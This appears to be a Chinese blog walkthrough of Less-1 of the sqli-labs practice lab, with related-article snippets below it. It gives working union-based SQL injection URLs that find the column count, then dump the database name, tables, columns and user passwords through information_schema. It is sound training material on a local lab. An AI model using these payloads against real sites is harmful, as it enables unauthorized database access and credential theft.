记一次sql注入过程 — sqli-labs(Less-1)

最新推荐文章于 2024-07-22 20:22:29 发布
最新推荐文章于 2024-07-22 20:22:29 发布
阅读量516 收藏 2
点赞数
分类专栏: sqli-labs 文章标签: sqli-labs sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46329243/article/details/114799539
版权

1.进入环境就是这样的界面
在这里插入图片描述
2.尝试将URL中 id=1 改为 id=1’ and 1='1 页面正常
在这里插入图片描述

3.尝试将URL中 id=1 改为 id=1‘ and 1='2 页面显示不正常 (由步骤2和步骤3可确定为单引号注入)
在这里插入图片描述

4.使用 order by 语句进行字段查询
–+为SQL注入中URL里使用的注释符
构造 id=1’ order by 1 --+ 页面显示正常
在这里插入图片描述
构造 id=1’ order by 2 --+ 页面显示正常
构造 id=1’ order by 3 --+ 页面显示正常
构造 id=1’ order by 4 --+ 页面显示不正常 (说明页面存在三个字段)
在这里插入图片描述
5.使用联合查询 union select
构造 id=’ union select 1,2,3 --+ 确定每个字段所在位置
在这里插入图片描述
6.爆出当前数据库名和当前用户名

http://localhost/sqli-labs/Less-1/?id=' union select 1,database(),user() --+

在这里插入图片描述
7.爆出表名称

http://localhost/sqli-labs/Less-1/?id=' union select 1,table_name,user() from information_schema.tables where table_schema='security' --+

在这里插入图片描述
使用 group_concat 显示出查询到的所有信息

http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(table_name),user() from information_schema.tables where table_schema='security' --+

在这里插入图片描述
查询到四个表,分别为 emails , referers,uagents,users
8.爆出users表中所有的列

http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(column_name),user() from information_schema.columns where table_schema='security' and table_name='users' --+

在这里插入图片描述
9.最后查询用户密码数据

http://localhost/sqli-labs/Less-1/?id=' union select 1,group_concat(username,password),user() from users  --+

在这里插入图片描述

看到最后,点个赞支持一下博主吧!

Star abuse
关注
专栏目录
sqli-labs第一关sql注入流程
qq_33598708的博客
03-28 1700
正常访问 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='1 正常 http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and '1'='2 错误 由' and '1'='1可知道是字符型,如果是数字型的这种会提示错误。 开始注入: http://127.0.0.
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1323
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
sql-labs-less1/2|SQL注入
TenG的博客
09-18 962
前言: 此系类文章为SQL注入讲解,在本地搭建sql-labs环境进行sql注入,我也是刚开始学sql注入,本篇文章为sql-labs前两关注入讲解,后面的会在学过以后陆续发布,写此系类文章是为了以后方便回顾,也希望能够帮到大家,如果有不正确的地方欢迎指正,由于讲解比较详细,操作过程截图比较多,全文比较干,大家谅解、感谢支持。 所需环境: phpstudy,sql-labs 工具: hackbar,可以不用这个工具,只是为了方便一点,我用的是免费版的。 关卡: Less-1、Less-2 正文: Less-
sqli-labs通关全攻略
最新发布
网安小白
07-22 400
第七步 查看users表中username,password的数据。这里存放着运行出来的数据,以表格的方式呈现。第六步 查看user表中列。根据显示,应该有四个字段。第三步 查看回显位置。
Sqli-Labs学习sql注入Sqli-Labs less-1&2
vegetable_haker的博客
10-25 857
Sqli-Labs:Less-1 尝试传入参数 localhost/sqlilabs/Less-1/?id=1 localhost/sqlilabs/Less-1/?id=1' localhost/sqlilabs/Less-1/?id=1'' localhost/sqlilabs/Less-1/?id=1''' 在测试以上传参的时候发现第一和第三条的时候页面能正...
SQL注入sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 5331
SQL注入sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
通过sqli-labs学习sql注入——基础挑战之less1-10
热门推荐
giantbranch的专栏
05-02 5万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/51207833 虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧 注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方...
从零sqli-labs学习过程 sqli-labs Less-3
fpxnb1的博客
03-24 2146
sqli-labs Less-3
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 782
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1510
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sql注入sqli-labs系列教程(less1-10)详解
wangqaz50的博客
02-03 382
<div id="article_content" class="article_content clearfix"> <link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="mar...
利用SQL注入漏洞登录后台的实现方法
09-11
工作需要,得好好补习下关于WEB安全方面的相关知识,故撰此文,权当总结,别无它意。读这篇文章,我假设读者有过写SQL语句的经历,或者能看得懂SQL语句
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 376
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
网络安全之sql注入-less1
koala_king的博客
08-17 1424
less-1 是字符注入,union注入的步骤一般有以下几步: 1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取敏感信息 1、判断注入点 我们再Less1中看到,id将作为参数来使用,因此我们输入: http://localhost/Less-1/?id=1 这是看到访问了第一个用户的用户名和密码: 此时加入单引号进行尝试,这里是在id后面加了一个单引号,这里发现了语句的错误。 You have an error in your SQL syntax; check t
SQL注入
2301_78612169的博客
01-28 563
一、判断是注入点的类型一、判断是注入点的类型1、单引号测试在id=1后面加上闭合符号 ' , 如果报错,则在后面加上--+将后面注释掉,如报不报错,则证明为字符型id=1' -- +
SQL注入——sqli-labs(Less-1)
E-Malon的博客
05-29 299
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sql-labs-less1 基于显错的union注入全过程
Mysmycbx的博客
07-03 657
sql-labs-less1 step0 准备 http://localhost/sqli-labs/Less-1/ HackBar MySQL Apache step1 测试 首先我们假装不知道后台的代码。其中sql查询语句为sql=“SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”; payload: http://localhost/sqli-labs/Less-1/?id=1 --+ mysql: SELECT * FROM users WHER
Sqli-labs靶场笔1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 465
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Star abuse

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值